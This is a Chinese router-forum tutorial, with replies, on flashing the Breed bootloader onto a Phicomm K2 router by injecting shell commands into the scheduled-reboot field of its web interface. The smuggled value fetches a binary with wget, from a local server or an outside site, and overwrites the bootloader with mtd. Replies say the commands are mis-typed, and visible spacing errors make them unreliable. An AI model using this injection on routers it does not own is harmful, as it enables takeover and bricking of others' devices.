QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888

新版k2刷机教程(22.5.10.176)

K2通用刷breed教程-by叶主任
支持最新固件22.5.10.176

2.   电脑安装IIS,利用本地web服务把breed下载到K2(win10为例)
Win+R打开运行,输入control.exe打开控制面板,确定:
file:///C:/Users/work/AppData/Local/Temp/msohtmlclip1/01/clip_image001.png
选择卸载程序:
file:///C:/Users/work/AppData/Local/Temp/msohtmlclip1/01/clip_image003.jpg
启用或关闭windows功能:
file:///C:/Users/work/AppData/Local/Temp/msohtmlclip1/01/clip_image004.png
勾上IIS,确定:
file:///C:/Users/work/AppData/Local/Temp/msohtmlclip1/01/clip_image005.png
打开浏览器访问http://192.168.2.x,x为你本地设置或自动获取的ip(我是设置成100):
file:///C:/Users/work/AppData/Local/Temp/msohtmlclip1/01/clip_image007.jpg
把下载好的breed-mt7620-phicomm-psg1208.bin放到IIS的默认目录C:\inetpub\wwwroot,然后访问http://192.168.2.100/breed-mt7620-phicomm-psg1208.bin 测试是否能下载:
file:///C:/Users/work/AppData/Local/Temp/msohtmlclip1/01/clip_image009.jpg
3.   用360浏览器的极速模式登陆路由器默认192.168.2.1,登陆进去之后在这里操作,按F12调出审核元素,并右上角有一个开关按键,选择定时重启路由器。

file:///C:/Users/work/AppData/Local/Temp/msohtmlclip1/01/clip_image011.jpg
CTRL+F查找05字样:
file:///C:/Users/work/AppData/Local/Temp/msohtmlclip1/01/clip_image012.png
修改value=“05”为value=“05 |wget -T 10 http://192.168.2.100/breed-mt7620-phicomm-psg1208.bin -O/tmp/breed.bin && [ -f /tmp/breed.bin ] && mtd unlockBootloader&&mtd -r write /tmp/breed.bin Bootloader”,然后选择定时重启中的05,保存后会自动刷机并重启:
file:///C:/Users/work/AppData/Local/Temp/msohtmlclip1/01/clip_image014.jpg

备注:利用定时重启的WEB漏洞输入如下语句就可以更加安全的刷写:05 |wget -T10 http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin -O/tmp/breed.bin && [ -f /tmp/breed.bin ] && [ $(md5sum/tmp/breed.bin|cut -d ' ' -f1) = 29bb021be2cc037ca4d8daa2d4b90a59 ] &&mtd unlock Bootloader&&mtd -r write /tmp/breed.bin Bootloader注:这个是一行语句,不要分行,拷贝的时候不要拷贝错了(拷漏字符)

4.   如果执行成功,K2会自动复位,指示灯变红,表示最新的breed已经刷入

如果失败,K2不会复位,也不会损坏uboot,但是强烈建议如果失败在执行脚本后30秒之内不要进行任何操作(比如重新执行脚本、断电、复位等)。注:所有版本都可以直接刷,不需要降级什么的操作,刷好后直接用breed刷入第三方固件。breed进入方式:电脑网线连接LAN口自动获取 IP 地址,按住K2复位键再通电,持续按住几秒,然后电脑访问http://192.168.1.1即可在WEB刷第三方固件

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

我的恩山、我的无线 The best wifi forum is right here.
我也是新手,大家可以加群一起研究

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

我的恩山、我的无线 The best wifi forum is right here.

感谢分享! K2还是很不错的

按照你的方式刷了之后没反应。。然后拔了电源重新插 显示红灯,然后进不了系统,然后打192.168.2.1进firm。。。

这个重启漏洞还是很好用的

点击保存没有反应时怎么回事

版本号 22.5.10.176,可以刷吗

应该用这条命令,上面两个脚本都写错了。05 |wget -T 10 http://192.168.2.这里换成你自己的IP/breed-mt7620-phicomm-psg1208.bin -O/tmp/breed.bin && [ -f /tmp/breed.bin ] && mtd unlock Bootloader&&mtd -r write /tmp/breed.bin Bootloader

看的稀里糊涂的

怎样保存审查元素啊

毫无卵用的教程  点击保存就没反应

看着怎么这么复杂啊,网上有个教程非常简单,不知道能不能刷

看着感觉有点复杂

能行么?